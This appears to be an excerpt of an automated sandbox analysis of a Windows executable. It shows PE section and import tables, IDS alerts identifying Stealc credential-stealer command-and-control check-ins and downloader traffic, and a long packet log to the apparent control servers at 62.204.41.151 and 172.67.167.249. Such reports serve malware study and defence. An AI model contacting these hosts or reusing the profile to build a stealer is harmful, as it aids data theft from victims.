IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x39c25	0x39e00	61dbfb1a2889ac3f945aa7563bf6860b	False	0.580002193574514	data	6.650563266689536	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3b000	0x1527e	0x15400	3e02880a89652786ddfc2bb708b734bb	False	0.4541590073529412	data	5.261579660705899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x51000	0x34ac	0x2400	f779e56688c9cae0d7a4311b8c1e266b	False	0.1957465277777778	data	4.302754787590875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x55000	0x91b0	0x9200	345e608c084527fd991c71b952390171	False	0.7279537671232876	data	6.662177931444958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x554f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Japanese	Japan	0.8581560283687943
RT_ICON	0x55960	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Japanese	Japan	0.8290983606557377
RT_ICON	0x562e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Japanese	Japan	0.8072232645403377
RT_ICON	0x57390	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Japanese	Japan	0.7565352697095435
RT_ICON	0x59938	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	Japanese	Japan	0.7324043457723193
RT_ICON	0x5dbb0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Japanese	Japan	0.8803191489361702
RT_GROUP_ICON	0x5db60	0x4c	data	Japanese	Japan	0.7894736842105263
RT_GROUP_ICON	0x5e018	0x14	data	Japanese	Japan	1.25
RT_VERSION	0x55250	0x2a8	data	Japanese	Japan	0.49558823529411766
RT_MANIFEST	0x5e030	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	GetProcessHeap, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileW, FindFirstFileExW, WriteConsoleW, FindClose, HeapReAlloc, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetFileType, SetFilePointerEx, GetConsoleCP, HeapSize, SetEndOfFile, lstrlenW, WaitForSingleObject, CloseHandle, WriteFile, CreateFileW, GlobalFree, GlobalUnlock, GlobalLock, GlobalAlloc, DeleteFileW, GetTempFileNameW, GetTempPathW, ExitProcess, MulDiv, GetLastError, CreateMutexW, Sleep, FlushFileBuffers, HeapAlloc, HeapFree, ReadConsoleW, GetConsoleMode, ReadFile, GetACP, GetStdHandle, GetModuleHandleExW, ExitThread, RaiseException, RtlUnwind, LoadLibraryW, UnregisterWaitEx, QueryDepthSList, InterlockedFlushSList, InterlockedPushEntrySList, InterlockedPopEntrySList, ReleaseSemaphore, VirtualFree, VirtualProtect, VirtualAlloc, GetVersionExW, LoadLibraryExW, GetModuleHandleA, DuplicateHandle, WaitForSingleObjectEx, GetCurrentProcess, SwitchToThread, GetCurrentThread, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, WideCharToMultiByte, QueryPerformanceCounter, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, CreateTimerQueue, SetEvent, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes, FreeLibrary, FreeLibraryAndExitThread, GetModuleFileNameW
USER32.dll	GetMessageW, TranslateMessage, DispatchMessageW, LoadCursorW, RegisterClassW, GetSystemMetrics, MoveWindow, ShowWindow, UpdateWindow, CreateWindowExW, SetLayeredWindowAttributes, GetClientRect, GetDC, ReleaseDC, DefWindowProcW, DestroyWindow, PostQuitMessage, GetKeyState, SetCapture, ReleaseCapture, MessageBoxW, LoadIconW, RegisterClassExW, SetTimer, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard
GDI32.dll	DeleteDC, BitBlt, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, TextOutW, SetTextColor, SetBkMode, CreateFontW, GetDeviceCaps, Rectangle, CreatePen, SelectObject, CreateSolidBrush, GetStockObject
ADVAPI32.dll	RegSetValueExW, RegCreateKeyExW, RegCloseKey
SHELL32.dll	ShellExecuteExW, Shell_NotifyIconW
gdiplus.dll	GdipCloneImage, GdipSaveImageToFile, GdiplusShutdown, GdipCreateBitmapFromHBITMAP, GdipGetImageEncodersSize, GdipFree, GdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipDisposeImage
WININET.dll	HttpQueryInfoW, HttpSendRequestW, HttpAddRequestHeadersW, HttpOpenRequestW, InternetConnectW, InternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Japanese	Japan
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-22T09:24:19.080306+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49713	80	192.168.2.7	62.204.41.151
2024-08-22T09:24:01.488518+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49700	80	192.168.2.7	62.204.41.151
2024-08-22T09:24:00.412460+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49699	443	192.168.2.7	172.67.167.249

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 22, 2024 09:23:59.405265093 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:23:59.405302048 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:23:59.405368090 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:23:59.416770935 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:23:59.416789055 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:23:59.892195940 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:23:59.892285109 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:23:59.951430082 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:23:59.951448917 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:23:59.951811075 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:23:59.951881886 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:23:59.955682993 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:23:59.996495008 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:24:00.412480116 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:24:00.412547112 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:24:00.412565947 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:24:00.412594080 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:24:00.412611961 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:24:00.412626982 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:24:00.418850899 CEST	49699	443	192.168.2.7	172.67.167.249
Aug 22, 2024 09:24:00.418867111 CEST	443	49699	172.67.167.249	192.168.2.7
Aug 22, 2024 09:24:00.779616117 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:00.784621000 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:00.784708023 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:00.784992933 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:00.789752960 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488389015 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488415956 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488426924 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488437891 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488449097 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488466024 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488476992 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488501072 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488517046 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488518000 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.488529921 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.488518000 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.488609076 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.488609076 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.493386030 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.493400097 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.493480921 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.614583969 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.614645958 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.614656925 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.614667892 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.614677906 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.614692926 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.614707947 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.614739895 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.615042925 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615055084 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615066051 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615083933 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.615112066 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.615391970 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615439892 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.615442038 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615457058 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615475893 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.615478992 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615492105 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.615492105 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.615520954 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.615536928 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.616256952 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.616267920 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.616278887 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.616296053 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.616306067 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.616307020 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.616321087 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.616329908 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.616358995 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.617057085 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.617103100 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.617129087 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.617161036 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.619565964 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.619636059 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.703151941 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.703197956 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.703212023 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.703226089 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.703248978 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.703289986 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.740811110 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.740844011 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.740854025 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.740881920 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.740891933 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.740904093 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.740914106 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.740925074 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741059065 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.741269112 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741285086 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741295099 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741333961 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.741343021 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741357088 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741358995 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.741369963 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741384029 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741389036 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.741404057 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741414070 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.741416931 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.741442919 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.741463900 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742016077 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742041111 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742058992 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742069006 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742080927 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742089987 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742091894 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742105007 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742113113 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742136955 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742136955 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742149115 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742156029 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742182016 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742208004 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742693901 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742767096 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742791891 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742801905 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742832899 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742842913 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742847919 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742852926 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742865086 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742870092 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742877007 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742887974 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742896080 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742898941 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.742950916 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.742950916 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.743403912 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.743427038 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.743437052 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.743459940 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.743491888 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.743495941 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.743508101 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.743535995 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.743558884 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.748248100 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.748322964 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.748322964 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.748332977 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.748343945 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.748373032 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.748429060 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.791971922 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.791990042 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.792002916 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.792094946 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.795162916 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.795173883 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.795185089 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.795257092 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.829516888 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.829535961 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.829546928 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.829618931 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867228031 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867253065 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867264986 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867274046 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867285013 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867294073 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867305040 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867305040 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867328882 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867345095 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867363930 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867374897 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867386103 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867398977 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867408037 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867418051 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867428064 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867429972 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867438078 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867448092 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867449999 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867460966 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867486000 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867903948 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867913961 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867927074 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.867945910 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.867961884 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.868252993 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868263960 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868273973 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868283987 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868300915 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868310928 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868321896 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868330956 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868343115 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868350983 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868506908 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.868674994 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868685961 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868696928 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868745089 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.868762016 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868778944 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868788958 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868798971 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868819952 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.868825912 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868837118 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.868860960 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.868926048 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869252920 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869262934 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869272947 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869301081 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869329929 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869333029 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869339943 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869349957 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869358063 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869359970 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869374037 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869395018 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869411945 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869414091 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869421959 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869431973 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869436026 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869462013 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869945049 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869956017 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869976997 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869986057 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.869993925 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.869997978 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.870012045 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.870035887 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.872276068 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.872292995 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.872313976 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.872323990 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.872332096 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.872335911 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.872349024 CEST	49700	80	192.168.2.7	62.204.41.151
Aug 22, 2024 09:24:01.872350931 CEST	80	49700	62.204.41.151	192.168.2.7
Aug 22, 2024 09:24:01.872374058 CEST	49700	80	192.168.2.7	62.204.41.151
